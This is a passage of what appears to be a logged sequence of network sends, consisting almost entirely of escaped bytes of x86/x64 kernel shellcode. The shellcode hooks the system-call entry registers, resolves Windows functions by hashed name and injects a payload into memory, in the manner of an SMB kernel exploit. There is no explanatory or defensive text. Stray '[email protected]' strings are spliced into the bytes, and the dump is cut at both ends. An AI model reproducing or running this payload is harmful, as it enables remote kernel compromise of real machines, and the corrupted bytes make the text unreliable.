00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 10, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\
\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\x